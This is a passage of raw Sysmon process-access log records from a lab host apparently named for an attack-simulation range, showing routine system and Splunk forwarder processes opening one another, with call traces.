ll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3668,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.541\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.541","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3669,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.541\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.541","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3670,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.541\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.541","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3671,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.541\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.541","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3672,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.541\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.541","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3673,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.541\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.541","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3674,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.541\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.541","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3675,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.541\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1104-5F25-0000-0010EB8B0500}\r\nTargetProcessId: 4548\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.541","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010EB8B0500}","TargetProcessId":"4548","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3676,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.775\r\nSourceProcessGUID: {E2A3D6B1-1104-5F25-0000-0010EB8B0500}\r\nSourceProcessId: 4548\r\nSourceThreadId: 4544\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program 